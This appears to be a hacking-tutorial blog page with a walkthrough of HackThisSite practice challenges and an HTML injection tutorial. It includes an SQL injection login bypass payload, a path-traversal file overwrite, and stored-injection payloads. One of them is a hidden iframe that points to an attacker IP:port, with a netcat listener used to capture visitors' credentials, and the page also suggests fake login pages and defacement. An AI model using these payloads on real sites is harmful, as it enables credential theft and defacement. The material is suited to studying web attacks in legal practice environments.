Kali Linux

Kali LInux Tutorials

Hacking Castle

Hacking Castle

Hacking

Ethical Hacking and Cybersecurity Tutorials

Metasploit

Hacking with Metasploit

SQLMAP

Hacking in android in termux using sqlmap

Sunday, January 12, 2020

Hack This Site | Info,Walkthrough and Review


Hack This Site | Info, Walkthrough, and Review

HackThisSite.org, normally alluded to as HTS, is an internet hacking and security site established by Jeremy Hammond. The site is kept up by individuals from the network after his departure. 
It intends to furnish clients with an approach to learn and rehearse essential and progressed "hacking" aptitudes through a progression of difficulties in a protected and legitimate condition.

Hack This Site | Info,Walkthrough and Review
In Short, you can demonstrate and learn basic to advanced hacking skills from Hack This Site.

So without wasting time, we are going to dive into Hackthissite.org

The first thing you need to do is register to site.  simple and easy. 


Few features of HTS :

1) Provide real-time hacking scenarios.
2) many articles and feeds on recent technologies, Programming languages, exploits & tutorials.
3) an excellent forum consisting of topics starting from basic to most sophisticated stuff you'll find on the web. Some of the various topics would be Cryptography, Mathematics, Design, Human psychology and far more.
4) Great collection of warez that would be used for private and hosted challenges.
5) Hackthisite IRC, Where you'll meet a number of the foremost talented people on the web.
6) Last but not the least -> Basic challenges, Realistic challenges, JavaScript challenges & all the others which are the base of HTS and keeping it interesting since 2005.

list of challenges we have here...

Hackthissite Challenges
Hackthissite Challenges

here we are going to solve some challenges for better understanding and Fun.

Hack This Site Basic mission 1 

In this simple challenge, our skill of HTML is going to be useful just Inspect that page and find login form you can see there password

Hack This Site Basic Challenge 1
Hack This Site Basic mission 1 



as you can see the password is saved in HTML in there.. easy right..!!
but after every challenge difficulty level increases and become harder to complete challenges

moving on to next challenge


Hack This Site Basic mission 2


Hack This Site Basic mission 2
Hack This Site Basic mission 2

This challenge really require some thinking and common sense 

so there is no password file uploaded to check where it is right password or not so any password you will enter give you an incorrect password.. 

but the catch is if we submit a blank password it will not check up and confirm it directly..
 Just submit a blank field and it will show congrats you completed challenge..



Hack this Site Basic mission 3



Hack this Site Basic mission 3
Hack this Site Basic mission 3




This time password file is present there we just need to find it. in order to do that we need to inspect the site and find that password file..


Hackthissite basic challenge 3
Hackthissite basic mission 3

after searching for some time I find that file password.php in there..

we just need to open that file adding it to url..

Hackthissite basic challenge 3 password.php
Hackthissite basic mission 3 password.php

as you can see after hitting enter password is directly shown in there just need to copy it and paste it in the password field and hit submit.. and we passed another challenge..

Hack this site basic mission 4


Hack this site basic mission 4

Hack this site basic mission 4



This time our developer sam made a script to send him password via email 
we need to find his email address first in order to do so inspect an element and find an email address in HTML tags..

Hack this site basic challenge 4
Hack this site basic challenge 4


after inspecting HTML I found the email address of sam which is sam@hackthissite.org

just need to change this email address with our email address so that the script will send a password to our email address..

now click on that script named send the password to sam and this page will appear

Hack this site basic challenge 4
Hack this site basic challenge 4

and password will be sent to the email we changed simply open that email copy password and paste it in password field hit submit.. and we passed another challenge..


this is some of the basic challenges I wanted to show you there are more to play with.. try to solve those challenges by your own smile will spread on your face after every challenge you passed..
go ahead and take challenges..


Realistic Challenges


Now we are going to see some Realistic challenges which are really fun to solve and test your hacking skills .. 
there are lots of challenges out there but I will show you my favorite 2 challenges
without wasting time lets get into it..

Hack this site realistic mission 2

Hack this site realistic mission 2
Hack this site realistic mission 2

first of all, don't get offended because of this challenge its just a demo site nothing represent here USA or iran..

our goal here is to take down this site..

first, we need to inspect the site to find any useful information to escalate it further..
after inspecting it I found one juicy file which is update.php 

Hack this site realistic mission 2
Hack this site realistic mission 2 page

by adding update.php in URL I found very interesting page there...

yesss.. we found login page but in order to gain access to login page need to find username and password.. right.?

we can hack this login page with an old school manual SQL Injection attack..

to check SQL error need to find perfect payload..

after some trial and error, I found that login page giving error on some post based union queries like 

1=1--  

Hack this site realistic mission 2 login page
Hack this site realistic mission 2 login page

after playing with it I got payload   ' or 1=1--   which is worked perfectly and we got admin access

hence we completed the challenge...


Hack This Site Realistic mission 3

Hack This Site Realistic mission 3
Hack This Site Realistic mission 3

This realistic challenge, we need to recover a poem site which is defaced by some bad hackers.

after opening defaces site we need to Inspect it.

Hack This Site Realistic mission 3 Hacked page
Hack This Site Realistic mission 3 Hacked page

after inspecting that hacked page I found out that green HTML text over there..
which suggests the old site is still up there and backed up at oldindex.html
so we need to find it first 
in order to do that type oldindex.html in the end of URL and hit enter..

Hack This Site Realistic mission 3 oldindex.html
Hack This Site Realistic mission 3 oldindex.html
here we can see that the poem site is still running in background..
now we need to post this page in index.html by submitting this pages source code..
but catch here  We must use our previous path traversal knowledge to place the file in the correct directory.
which means we need to submit it on one directory up to show correctly in the index page..
in  order to do that first copy source code of poem site and click on submit a poem


Hack This Site Realistic mission 3
Hack This Site Realistic mission 3 

here at the name of a poem we need to add directory which is  ../index.html
and paste source code in poem box and add poem..
after this poem will be added on index.hml which is a home page and defaced page get removed automatically...

hence challenge completed= respect+


I had too much fun solving realistic challenge.. must try..
Share:

Sunday, January 5, 2020

HTML Injection tutorial


HTML Injection


In order to know what HTML injection is first, we need to know what is HTML..

HTML is Hyper Text Markup Language It is for the most part being utilized for making sites. Website pages and content are getting sent to a program as HTML reports. At that point, those HTML reports are being changed over into ordinary sites and showed for the last clients.

in this tutorial, we will learn how to do HTML injection practically.

What is HTML Injection?

The substance of this sort of injection attack is an injection of HTML code into the search field or any of the vulnerable pieces of the site. The Malicious client sends malicious HTML code through that any of the vulnerable fields such as URL with a reason to manipulate the web composition or any data, that is shown to the client.
we are going to see types of HTML injection and how to do it.

Types of HTML Injections

  • Reflected HTML Injection
  • Stored HTML Injection

 Reflected HTML Injection


Reflected Injection attack can be performed in accordance to the HTTP technique that are, GET method and POST method. as we know the working of these requests,
with POST  data is gets sent
with GET  data is gets requested.
By checking source code we can find which method can be used for that website.

Reflected HTML Injection (GET)

Reflected GET Injection occurs, when our input is being displayed (reflected) on the website. if we used HTML code on a vulnerable website then it will be displayed on that website at that instance and also HTML code is injected in that website's HTML document.

as you can see in the image below


Reflected get injection
Reflected get injection
as we typed HTML tag <h1>html injection</h1> login form its reflecting in the site which means this site is vulnerable to HTML injection.

to find its vulnerable or not just needed any HTML tag to display in it. 


Reflected HTML Injection (POST)

in Reflected GET Injection, It occurs when an attacker sends a malicious HTML code instead of valid POST method requests parameters.

it is quite difficult to escalate than GET because POST request sent by a site to the server that's why sometimes we need to tamper data ( firefox addon ) to craft and send POST request to the server. 

Reflected POST Injection
Reflected POST Injection



in this image above HTML code is shown in simple <h1>Hacking Castle</h1>  which displayed in there but its send to server by POST method because it's not the defined parameter. 
we will see how to use tamper data in the next type..



Reflected HTML Injection ( URL )

Reflected URL HTML Injection occurs when HTML code is getting sent by an attacker through the website URL displayed on the website and simultaneously injected to the website’s HTML document.

this time we will be using tamper data to craft URL and send it to server this URL will be shown to other persons visiting the same page. 

in order to do that open tamper data and change URL from there and send requests till they reach to server then stop it.


Editing url in tamper data
Editing URL in tamper data




Reflected url
Reflected URL


as you can see image above link URL is changed to request we crafted using tamper data.
this will be stored in page for other users too so we can escalate many malicious things to get user info
that we going to see in the next type of HTML injection.



Stored HTML Injection

stored injection attack occurs when a malicious HTML code is saved in the webserver and it will arbitrarily execute when victim tries use that function.

Stored HTML Injection


this page contains submit a form which stores the input of the user and list  it below but if it is not used parameter in it then it will be injected by HTML tag and vulnerable to HTML Injection

we will be going to use HTML tag

     <h1>Hacking Castle</h1>

  to see it's vulnerable or not.

vulnerable to stored HTML Injection
vulnerable to stored HTML Injection

as we can see this HTML tag stored in the page.

lets see another example this time we will use <script>alert("Hacking Castle");</script>
this javascript code will alert the page with popup.

popup.

in the image above we can see it popped up on-page and its also stored in the form it means whenever someone opens that page or refresh it this will pop up there. 

that's the difference between reflected and stored HTML Injection.

so this is about Stored HTML Injection now we are going to see how can we escalate further to steal user informations..


Stealing user Information using HTML Injection

here we are going to use iframe tag and Netcat listener to get useful information.
first, we will be using this iframe tag  

<iframe src="http://(IP:port)/test* height="0" width="0"></iframe>

before hitting submit open Netcat session using terminal and type command 

nc -nvlp (port)

it will open the listener then hit submit and we will get the user credential of anyone who opens that page..

getting user credentials using HTML Injection
getting user credentials using HTML Injection


more ideas to play with


  • HTML is a very good language to play with.  we can make HTML login page with Netcat listener to get users login credentials

  • We have hell lots of HTML code is to deface the site if its vulnerable 

These things I leave up for you guys play with it and have fun.

This cheat sheet will help you with that..
       
 Cheat sheet 


Conclusion


it is observable, that there are unquestionably less writing and data about HTML Injection. Along these lines, analyzers may choose not to play out this sort of testing. Nonetheless, for this situation, HTML attack chances possibly not assessed enough. 

As we have broken down in this instructional exercise, with this kind of Injection the entire plan of your site might be devastated or even the client's login information might be taken. In this way, it is strongly prescribed to incorporate HTML Injection into security testing and contribute great information.


that's all of it about HTML Injection....


Happy Hacking


Share:

Popular Posts